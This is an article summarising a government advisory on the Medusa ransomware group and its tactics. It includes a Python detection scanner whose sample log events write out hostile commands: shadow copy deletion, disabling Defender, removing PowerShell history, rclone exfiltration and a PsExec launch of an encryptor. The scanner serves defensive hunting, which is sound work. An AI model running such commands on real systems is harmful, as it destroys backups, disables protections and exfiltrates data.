An advisory has been released concerning the Medusa ransomware-as-a-service (RaaS) group, which currently claims more than 300 victims across critical infrastructure sectors such as healthcare, manufacturing, and education. The group began operating in June 2021 as a closed group before adopting the RaaS model, recruiting affiliates to carry out attacks in exchange for a share of the ransom payments.
About two years after it was formed, Medusa launched a data leak site that lists victims and publishes stolen data when no ransom is paid. In this double-extortion model, the victim must pay to obtain the decryption keys and to stop the release of the stolen data. This is typical of RaaS groups, though in Medusa's case its core members have retained control of ransom negotiations.
According to the joint cybersecurity advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Federal Bureau of Investigation (FBI), the Medusa developers recruit initial access brokers (IABs) on cybercriminal forums and marketplaces and offer them incentives to work exclusively with Medusa. The authoring agencies have observed affiliates using phishing to obtain credentials for access to victims' systems and exploiting unpatched software vulnerabilities, such as the 2024 Fortinet EMS SQL injection vulnerability CVE-2023-48788 and the ScreenConnect vulnerability CVE-2024-1709.
Once a victim's system has been accessed, Medusa threat actors use living-off-the-land techniques for user, network, and file enumeration, relying on tools such as SoftPerfect Network Scanner, Advanced IP Scanner, Windows Command Prompt, PowerShell, and Ingress Tool Transfer capabilities, as well as Windows Management Instrumentation (WMI) to query system information.
The authoring agencies have observed Medusa threat actors using several PowerShell detection-evasion techniques, and they are known to cover their tracks by deleting the PowerShell command-line history. Endpoint detection and response (EDR) tools are disabled by using vulnerable or legitimate drivers to kill their processes. Legitimate remote access software is frequently used to evade detection and assist lateral movement, alongside PsExec and Remote Desktop Protocol (RDP). Rclone is used to assist data exfiltration, and the encryptor is deployed across the network using tools such as PDQ Deploy, Sysinternals PsExec, and BigFix. The threat actors also disable Windows Defender and other security applications on particular targets. Backup processes are stopped and shadow copies are deleted to prevent recovery of encrypted files without a ransom payment. Victims have 48 hours to negotiate the ransom payment before Medusa actors contact them directly by phone or email. In one case, a second ransom demand was issued after the ransom had already been paid, with the affiliate claiming not to have received the payment.
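As an added illustration of how a defender might hunt for the behaviours described above (this is example code, not from the advisory or its authoring agencies): a small Python scanner that runs a handful of command-line detection rules over constructed Sysmon-style process-creation events. The rule patterns, the key=value log layout, and the sample events are all assumptions for this example.

```python
import re
from dataclasses import dataclass

# Detection rules keyed to behaviours the advisory describes: shadow copy deletion,
# PowerShell history removal, Defender tampering, Rclone exfiltration, PsExec use.
# This rule set is an assumption for the example, not the advisory's own IOC list.
RULES = {
    "shadow copy deletion": r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete",
    "powershell history removal": r"clear-history|consolehost_history\.txt",
    "defender realtime disabled": r"set-mppreference\b.*-disablerealtimemonitoring\s+\$?true",
    "rclone exfiltration": r"(^|\\|\s)rclone(\.exe)?\s+(copy|sync|move)\s",
    "psexec remote execution": r"psexec(64)?(\.exe)?\s+\\\\",
}

@dataclass
class Hit:
    line_no: int
    rule: str
    command: str

def parse_command_line(event):
    """Extract the CommandLine field from a key=value process-creation event."""
    m = re.search(r"CommandLine=(.*)$", event)
    return m.group(1).strip() if m else None

def scan(events):
    """Return one Hit per (event, rule) pair whose command line matches a rule."""
    hits = []
    for n, event in enumerate(events, 1):
        cmd = parse_command_line(event)
        if cmd is None:
            continue
        for name, pattern in RULES.items():
            if re.search(pattern, cmd, re.IGNORECASE):
                hits.append(Hit(n, name, cmd))
    return hits

# Constructed sample events in a simplified Sysmon-style key=value layout.
SAMPLE_LOG = [
    "EventID=1 Image=C:\\Windows\\System32\\vssadmin.exe CommandLine=vssadmin delete shadows /all /quiet",
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell -c Set-MpPreference -DisableRealtimeMonitoring $true",
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell -c Remove-Item $env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt",
    "EventID=1 Image=C:\\Tools\\rclone.exe CommandLine=rclone copy D:\\Finance remote:backup --transfers 8",
    "EventID=1 Image=C:\\Tools\\PsExec.exe CommandLine=PsExec.exe \\\\FILESRV01 -s cmd /c encryptor.exe",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"event {hit.line_no}: {hit.rule}: {hit.command}")
```

In practice the same rules would be fed real Sysmon Event ID 1 or Windows 4688 command lines from a SIEM; the benign notepad event shows the rules do not fire on ordinary activity.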
The advisory provides indicators of compromise (IOCs), the MITRE ATT&CK tactics and techniques identified, and recommended mitigations, the most important of which are remediating known vulnerabilities immediately, segmenting networks to limit lateral movement, filtering network traffic to prevent unknown or untrusted sources from reaching remote services on internal systems, requiring multifactor authentication for VPNs, webmail, and all accounts with access to critical systems, and providing HIPAA training to healthcare employees on phishing identification and prevention.